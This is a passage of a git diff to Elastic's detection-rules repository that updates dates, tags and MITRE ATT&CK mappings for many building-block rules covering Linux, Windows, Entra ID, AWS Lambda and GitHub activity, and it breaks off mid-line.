332fd65a447..81a0034b824 100644 --- a/rules_building_block/discovery_linux_sysctl_enumeration.toml +++ b/rules_building_block/discovery_linux_sysctl_enumeration.toml @@ -2,7 +2,7 @@ creation_date = "2023/06/08" integration = ["auditd_manager"] maturity = "production" -updated_date = "2025/12/24" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -44,13 +44,7 @@ For this detection rule to trigger, the following additional audit rules are req Add the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable. """ severity = "low" -tags = [ - "Data Source: Auditd Manager", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Rule Type: BBR", -] +tags = ["Tactic: Defense Evasion", "Tactic: Discovery", "Data Source: Auditd Manager", "OS: Linux", "Use Case: Threat Detection", "Rule Type: BBR"] timestamp_override = "event.ingested" type = "new_terms" @@ -70,15 +64,27 @@ file.path : ("/etc/sysctl.conf" or "/etc/sysctl.d" or /etc/sysctl.d/*) and not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1082" -name = "System Information Discovery" -reference = "https://attack.mitre.org/techniques/T1082/" +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - [rule.new_terms] field = "new_terms_fields" value = ["process.executable"] diff --git a/rules_building_block/discovery_linux_system_owner_user_discovery.toml b/rules_building_block/discovery_linux_system_owner_user_discovery.toml index fe5f446429f..f5ed9b7ff4e 100644 --- a/rules_building_block/discovery_linux_system_owner_user_discovery.toml +++ b/rules_building_block/discovery_linux_system_owner_user_discovery.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/10" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -50,11 +50,15 @@ id = "T1069" name = "Permission Groups Discovery" reference = "https://attack.mitre.org/techniques/T1069/" +[[rule.threat.technique.subtechnique]] +id = "T1069.001" +name = "Local Groups" +reference = "https://attack.mitre.org/techniques/T1069/001/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - [rule.new_terms] field = "new_terms_fields" value = ["process.parent.executable", "process.command_line", "host.id"] diff --git a/rules_building_block/discovery_net_share_discovery_winlog.toml b/rules_building_block/discovery_net_share_discovery_winlog.toml index 4d83aa90687..6face7dc939 100644 --- a/rules_building_block/discovery_net_share_discovery_winlog.toml +++ b/rules_building_block/discovery_net_share_discovery_winlog.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/14" integration = ["windows", "system"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -20,15 +20,7 @@ name = "Potential Network Share Discovery" risk_score = 21 rule_id = "b2318c71-5959-469a-a3ce-3a0768e63b9c" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Tactic: Collection", - "Rule Type: BBR", - "Data Source: Windows Security Event Logs", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Rule Type: BBR", "Tactic: Discovery", "Data Source: Windows Security Event Logs"] type = "eql" query = ''' @@ -44,26 +36,13 @@ sequence by user.name, source.port, source.ip with maxspan=15s [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1135" name = "Network Share Discovery" reference = "https://attack.mitre.org/techniques/T1135/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1039" -name = "Data from Network Shared Drive" -reference = "https://attack.mitre.org/techniques/T1039/" - - -[rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" - diff --git a/rules_building_block/discovery_net_view.toml b/rules_building_block/discovery_net_view.toml index 196586ddc82..abbd287678c 100644 --- a/rules_building_block/discovery_net_view.toml +++ b/rules_building_block/discovery_net_view.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2020/12/04" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -56,17 +56,7 @@ Hence for this rule to work effectively, users will need to add a custom ingest For more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Tactic: Collection", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Rule Type: BBR", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Discovery", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Rule Type: BBR"] timestamp_override = "event.ingested" type = "eql" @@ -91,6 +81,7 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1018" name = "Remote System Discovery" @@ -101,21 +92,7 @@ id = "T1135" name = "Network Share Discovery" reference = "https://attack.mitre.org/techniques/T1135/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1039" -name = "Data from Network Shared Drive" -reference = "https://attack.mitre.org/techniques/T1039/" - - -[rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" - diff --git a/rules_building_block/discovery_of_domain_groups.toml b/rules_building_block/discovery_of_domain_groups.toml index c64491dcc33..491bfd23563 100644 --- a/rules_building_block/discovery_of_domain_groups.toml +++ b/rules_building_block/discovery_of_domain_groups.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/23" integration = ["endpoint", "auditd_manager", "crowdstrike"] maturity = "production" -updated_date = "2025/10/17" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -44,14 +44,18 @@ process where host.os.type == "linux" and event.type == "start" and event.action [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1069" name = "Permission Groups Discovery" reference = "https://attack.mitre.org/techniques/T1069/" +[[rule.threat.technique.subtechnique]] +id = "T1069.002" +name = "Domain Groups" +reference = "https://attack.mitre.org/techniques/T1069/002/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - diff --git a/rules_building_block/discovery_posh_generic.toml b/rules_building_block/discovery_posh_generic.toml index d25af55f2b8..ca32bc8cca0 100644 --- a/rules_building_block/discovery_posh_generic.toml +++ b/rules_building_block/discovery_posh_generic.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/06" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -25,15 +25,7 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Collection", - "Tactic: Discovery", - "Data Source: PowerShell Logs", - "Rule Type: BBR", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Discovery", "Data Source: PowerShell Logs", "Rule Type: BBR"] timestamp_override = "event.ingested" type = "query" @@ -201,6 +193,7 @@ value = "?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Prot [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1007" name = "System Service Discovery" @@ -211,6 +204,11 @@ id = "T1012" name = "Query Registry" reference = "https://attack.mitre.org/techniques/T1012/" +[[rule.threat.technique]] +id = "T1016" +name = "System Network Configuration Discovery" +reference = "https://attack.mitre.org/techniques/T1016/" + [[rule.threat.technique]] id = "T1049" name = "System Network Connections Discovery" @@ -222,24 +220,25 @@ name = "Process Discovery" reference = "https://attack.mitre.org/techniques/T1057/" [[rule.threat.technique]] -id = "T1082" -name = "System Information Discovery" -reference = "https://attack.mitre.org/techniques/T1082/" +id = "T1069" +name = "Permission Groups Discovery" +reference = "https://attack.mitre.org/techniques/T1069/" + +[[rule.threat.technique.subtechnique]] +id = "T1069.002" +name = "Domain Groups" +reference = "https://attack.mitre.org/techniques/T1069/002/" [[rule.threat.technique]] id = "T1082" name = "System Information Discovery" reference = "https://attack.mitre.org/techniques/T1082/" -[[rule.threat.technique]] -id = "T1083" -name = "File and Directory Discovery" -reference = "https://attack.mitre.org/techniques/T1083/" - [[rule.threat.technique]] id = "T1087" name = "Account Discovery" reference = "https://attack.mitre.org/techniques/T1087/" + [[rule.threat.technique.subtechnique]] id = "T1087.001" name = "Local Account" @@ -250,7 +249,6 @@ id = "T1087.002" name = "Domain Account" reference = "https://attack.mitre.org/techniques/T1087/002/" - [[rule.threat.technique]] id = "T1135" name = "Network Share Discovery" @@ -270,37 +268,18 @@ reference = "https://attack.mitre.org/techniques/T1482/" id = "T1518" name = "Software Discovery" reference = "https://attack.mitre.org/techniques/T1518/" + [[rule.threat.technique.subtechnique]] id = "T1518.001" name = "Security Software Discovery" reference = "https://attack.mitre.org/techniques/T1518/001/" - [[rule.threat.technique]] id = "T1615" name = "Group Policy Discovery" reference = "https://attack.mitre.org/techniques/T1615/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules_building_block/discovery_posh_password_policy.toml b/rules_building_block/discovery_posh_password_policy.toml index fe12f739745..7b517268c32 100644 --- a/rules_building_block/discovery_posh_password_policy.toml +++ b/rules_building_block/discovery_posh_password_policy.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/12" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -88,16 +88,7 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Tactic: Execution", - "Data Source: PowerShell Logs", - "Rule Type: BBR", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Discovery", "Data Source: PowerShell Logs", "Rule Type: BBR", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -142,34 +133,16 @@ not user.id : "S-1-5-18" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1201" name = "Password Policy Discovery" reference = "https://attack.mitre.org/techniques/T1201/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules_building_block/discovery_post_exploitation_external_ip_lookup.toml b/rules_building_block/discovery_post_exploitation_external_ip_lookup.toml index ca94235feb2..b27f77bdb79 100644 --- a/rules_building_block/discovery_post_exploitation_external_ip_lookup.toml +++ b/rules_building_block/discovery_post_exploitation_external_ip_lookup.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2020/09/04" integration = ["endpoint"] maturity = "production" -updated_date = "2024/05/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -133,24 +133,18 @@ network where host.os.type == "windows" and network.protocol == "dns" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1016" name = "System Network Configuration Discovery" reference = "https://attack.mitre.org/techniques/T1016/" + [[rule.threat.technique.subtechnique]] id = "T1016.001" name = "Internet Connection Discovery" reference = "https://attack.mitre.org/techniques/T1016/001/" - -[[rule.threat.technique]] -id = "T1614" -name = "System Location Discovery" -reference = "https://attack.mitre.org/techniques/T1614/" - - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - diff --git a/rules_building_block/discovery_potential_memory_seeking_activity.toml b/rules_building_block/discovery_potential_memory_seeking_activity.toml index 1296b79194d..35696a3bf62 100644 --- a/rules_building_block/discovery_potential_memory_seeking_activity.toml +++ b/rules_building_block/discovery_potential_memory_seeking_activity.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2024/02/01" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/24" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -58,15 +58,3 @@ process where host.os.type == "linux" and event.type == "start" and event.action ) ''' -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1057" -name = "Process Discovery" -reference = "https://attack.mitre.org/techniques/T1057/" - -[rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules_building_block/discovery_process_discovery_via_builtin_tools.toml b/rules_building_block/discovery_process_discovery_via_builtin_tools.toml index 8b0c1ba8a90..c11eb222786 100644 --- a/rules_building_block/discovery_process_discovery_via_builtin_tools.toml +++ b/rules_building_block/discovery_process_discovery_via_builtin_tools.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/11" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -51,21 +51,10 @@ id = "T1057" name = "Process Discovery" reference = "https://attack.mitre.org/techniques/T1057/" -[[rule.threat.technique]] -id = "T1518" -name = "Software Discovery" -reference = "https://attack.mitre.org/techniques/T1518/" - -[[rule.threat.technique.subtechnique]] -id = "T1518.001" -name = "Security Software Discovery" -reference = "https://attack.mitre.org/techniques/T1518/001/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - [rule.new_terms] field = "new_terms_fields" value = ["process.parent.executable", "process.command_line", "host.id"] diff --git a/rules_building_block/discovery_remote_system_discovery_commands_windows.toml b/rules_building_block/discovery_remote_system_discovery_commands_windows.toml index 49272de507f..6efa2a5e64d 100644 --- a/rules_building_block/discovery_remote_system_discovery_commands_windows.toml +++ b/rules_building_block/discovery_remote_system_discovery_commands_windows.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2020/12/04" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -93,6 +93,7 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1016" name = "System Network Configuration Discovery" @@ -103,9 +104,17 @@ id = "T1018" name = "Remote System Discovery" reference = "https://attack.mitre.org/techniques/T1018/" +[[rule.threat.technique]] +id = "T1069" +name = "Permission Groups Discovery" +reference = "https://attack.mitre.org/techniques/T1069/" + +[[rule.threat.technique.subtechnique]] +id = "T1069.002" +name = "Domain Groups" +reference = "https://attack.mitre.org/techniques/T1069/002/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - diff --git a/rules_building_block/discovery_security_software_wmic.toml b/rules_building_block/discovery_security_software_wmic.toml index ace9b215e1b..cc4036d6568 100644 --- a/rules_building_block/discovery_security_software_wmic.toml +++ b/rules_building_block/discovery_security_software_wmic.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2020/10/19" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -77,31 +77,18 @@ process.args : "/namespace:\\\\root\\SecurityCenter2" and process.args : "Get" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1518" name = "Software Discovery" reference = "https://attack.mitre.org/techniques/T1518/" + [[rule.threat.technique.subtechnique]] id = "T1518.001" name = "Security Software Discovery" reference = "https://attack.mitre.org/techniques/T1518/001/" - - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1047" -name = "Windows Management Instrumentation" -reference = "https://attack.mitre.org/techniques/T1047/" - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules_building_block/discovery_suspicious_proc_enumeration.toml b/rules_building_block/discovery_suspicious_proc_enumeration.toml index 5416dfa0a22..ecbdf328a3a 100644 --- a/rules_building_block/discovery_suspicious_proc_enumeration.toml +++ b/rules_building_block/discovery_suspicious_proc_enumeration.toml @@ -2,7 +2,7 @@ creation_date = "2023/06/09" integration = ["auditd_manager"] maturity = "production" -updated_date = "2024/05/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -62,22 +62,16 @@ file.path : (/proc/*/cmdline or /proc/*/stat or /proc/*/exe) and not process.nam [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1057" name = "Process Discovery" reference = "https://attack.mitre.org/techniques/T1057/" -[[rule.threat.technique]] -id = "T1082" -name = "System Information Discovery" -reference = "https://attack.mitre.org/techniques/T1082/" - - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - [rule.threshold] field = ["host.id", "process.pid", "process.name"] value = 1 diff --git a/rules_building_block/discovery_system_network_connections.toml b/rules_building_block/discovery_system_network_connections.toml index b226cb4c1aa..64bbd52e576 100644 --- a/rules_building_block/discovery_system_network_connections.toml +++ b/rules_building_block/discovery_system_network_connections.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/11" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -45,6 +45,11 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1016" +name = "System Network Configuration Discovery" +reference = "https://attack.mitre.org/techniques/T1016/" + [[rule.threat.technique]] id = "T1049" name = "System Network Connections Discovery" @@ -54,7 +59,6 @@ reference = "https://attack.mitre.org/techniques/T1049/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - [rule.new_terms] field = "new_terms_fields" value = ["process.parent.executable", "process.command_line", "host.id"] diff --git a/rules_building_block/discovery_system_service_discovery.toml b/rules_building_block/discovery_system_service_discovery.toml index 4810cc175fd..1f8c79219de 100644 --- a/rules_building_block/discovery_system_service_discovery.toml +++ b/rules_building_block/discovery_system_service_discovery.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/01/24" integration = ["windows", "endpoint", "system"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -70,14 +70,18 @@ process where host.os.type == "windows" and event.type == "start" and process.pa [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1007" name = "System Service Discovery" reference = "https://attack.mitre.org/techniques/T1007/" +[[rule.threat.technique]] +id = "T1135" +name = "Network Share Discovery" +reference = "https://attack.mitre.org/techniques/T1135/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - diff --git a/rules_building_block/discovery_win_network_connections.toml b/rules_building_block/discovery_win_network_connections.toml index dc1f9d25751..6fd29c4a0e4 100644 --- a/rules_building_block/discovery_win_network_connections.toml +++ b/rules_building_block/discovery_win_network_connections.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/07/14" integration = ["endpoint"] maturity = "production" -updated_date = "2024/05/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -52,19 +52,28 @@ process where event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1016" +name = "System Network Configuration Discovery" +reference = "https://attack.mitre.org/techniques/T1016/" + [[rule.threat.technique]] id = "T1049" name = "System Network Connections Discovery" reference = "https://attack.mitre.org/techniques/T1049/" [[rule.threat.technique]] -id = "T1082" -name = "System Information Discovery" -reference = "https://attack.mitre.org/techniques/T1082/" +id = "T1087" +name = "Account Discovery" +reference = "https://attack.mitre.org/techniques/T1087/" +[[rule.threat.technique]] +id = "T1135" +name = "Network Share Discovery" +reference = "https://attack.mitre.org/techniques/T1135/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - diff --git a/rules_building_block/entra_id_identity_protection_risk_detections.toml b/rules_building_block/entra_id_identity_protection_risk_detections.toml index ba23d68e913..d1a6a5ecaf6 100644 --- a/rules_building_block/entra_id_identity_protection_risk_detections.toml +++ b/rules_building_block/entra_id_identity_protection_risk_detections.toml @@ -4,7 +4,7 @@ creation_date = "2025/05/18" integration = ["azure"] maturity = "production" promotion = true -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -29,16 +29,7 @@ risk_score = 47 rule_id = "da0d4bae-33ee-11f0-a59f-f661ea17fbcd" setup = "" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: Azure", - "Data Source: Microsoft Entra ID", - "Data Source: Microsoft Entra ID Protection", - "Data Source: Microsoft Entra ID Protection Logs", - "Use Case: Identity and Access Audit", - "Use Case: Threat Detection", - "Rule Type: BBR", -] +tags = ["Domain: Cloud", "Tactic: Credential Access", "Tactic: Initial Access", "Data Source: Azure", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Protection", "Data Source: Microsoft Entra ID Protection Logs", "Use Case: Identity and Access Audit", "Use Case: Threat Detection", "Rule Type: BBR"] timestamp_override = "event.ingested" type = "query" @@ -46,3 +37,38 @@ query = ''' event.dataset: "azure.identity_protection" ''' +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1110" +name = "Brute Force" +reference = "https://attack.mitre.org/techniques/T1110/" + +[[rule.threat.technique.subtechnique]] +id = "T1110.003" +name = "Password Spraying" +reference = "https://attack.mitre.org/techniques/T1110/003/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules_building_block/execution_aws_lambda_function_updated.toml b/rules_building_block/execution_aws_lambda_function_updated.toml index 773ea2fdede..a6e9fa6842e 100644 --- a/rules_building_block/execution_aws_lambda_function_updated.toml +++ b/rules_building_block/execution_aws_lambda_function_updated.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2024/04/20" integration = ["aws"] maturity = "production" -updated_date = "2024/09/01" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -36,15 +36,7 @@ references = [ risk_score = 21 rule_id = "1251b98a-ff45-11ee-89a1-f661ea17fbce" severity = "low" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS Lambda", - "Use Case: Asset Visibility", - "Tactic: Execution", - "Rule Type: BBR" -] +tags = ["Domain: Cloud", "Tactic: Execution", "Tactic: Persistence", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS Lambda", "Use Case: Asset Visibility", "Rule Type: BBR"] timestamp_override = "event.ingested" type = "query" @@ -58,14 +50,31 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1648" name = "Serverless Execution" reference = "https://attack.mitre.org/techniques/T1648/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1505" +name = "Server Software Component" +reference = "https://attack.mitre.org/techniques/T1505/" + +[[rule.threat.technique.subtechnique]] +id = "T1505.006" +name = "vSphere Installation Bundles" +reference = "https://attack.mitre.org/techniques/T1505/006/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules_building_block/execution_github_new_event_action_for_pat.toml b/rules_building_block/execution_github_new_event_action_for_pat.toml index 481941c1220..9f0a71e6543 100644 --- a/rules_building_block/execution_github_new_event_action_for_pat.toml +++ b/rules_building_block/execution_github_new_event_action_for_pat.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2025/12/24" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -17,14 +17,7 @@ name = "First Occurrence GitHub Event for a Personal Access Token (PAT)" risk_score = 21 rule_id = "ce08b55a-f67d-4804-92b5-617b0fe5a5b5" severity = "low" -tags = [ - "Domain: Cloud", - "Use Case: Threat Detection", - "Use Case: UEBA", - "Tactic: Execution", - "Rule Type: BBR", - "Data Source: Github", -] +tags = ["Domain: Cloud", "Use Case: Threat Detection", "Use Case: UEBA", "Rule Type: BBR", "Tactic: Persistence", "Data Source: Github"] timestamp_override = "event.ingested" type = "new_terms" @@ -37,17 +30,21 @@ github.programmatic_access_type:("OAuth access token" or "Fine-grained personal [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1648" -name = "Serverless Execution" -reference = "https://attack.mitre.org/techniques/T1648/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.001" +name = "Additional Cloud Credentials" +reference = "https://attack.mitre.org/techniques/T1098/001/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [rule.new_terms] field = "new_terms_fields" value = ["github.hashed_token", "event.action"] diff --git a/rules_building_block/execution_github_new_repo_interaction_for_pat.toml b/rules_building_block/execution_github_new_repo_interaction_for_pat.toml index cb75d586d8b..d214860a434 100644 --- a/rules_building_block/execution_github_new_repo_interaction_for_pat.toml +++ b/rules_building_block/execution_github_new_repo_interaction_for_pat.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2025/12/24" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -17,14 +17,7 @@ name = "First Occurrence of Private Repo Event from Specific GitHub Personal Acc risk_score = 21 rule_id = "1e9b271c-8caa-4e20-aed8-e91e34de9283" severity = "low" -tags = [ - "Domain: Cloud", - "Use Case: Threat Detection", - "Use Case: UEBA", - "Tactic: Execution", - "Rule Type: BBR", - "Data Source: Github", -] +tags = ["Domain: Cloud", "Use Case: Threat Detection", "Use Case: UEBA", "Rule Type: BBR", "Tactic: Collection", "Data Source: Github"] timestamp_override = "event.ingested" type = "new_terms" @@ -38,17 +31,21 @@ github.repository_public:false [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1648" -name = "Serverless Execution" -reference = "https://attack.mitre.org/techniques/T1648/" +id = "T1213" +name = "Data from Information Repositories" +reference = "https://attack.mitre.org/techniques/T1213/" +[[rule.threat.technique.subtechnique]] +id = "T1213.003" +name = "Code Repositories" +reference = "https://attack.mitre.org/techniques/T1213/003/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" [rule.new_terms] field = "new_terms_fields" value = ["github.hashed_token", "github.repo"] diff --git a/rules_building_block/execution_github_new_repo_interaction_for_user.toml b/rules_building_block/execution_github_new_repo_interaction_for_user.toml index ba867350a28..50b57366d35 100644 --- a/rules_building_block/execution_github_new_repo_interaction_for_user.toml +++ b/rules_building_block/execution_github_new_repo_interaction_for_user.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2025/12/24" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -17,14 +17,7 @@ name = "First Occurrence of GitHub User Interaction with Private Repo" risk_score = 21 rule_id = "01c49712-25bc-49d2-a27d-d7ce52f5dc49" severity = "low" -tags = [ - "Domain: Cloud", - "Use Case: Threat Detection", - "Use 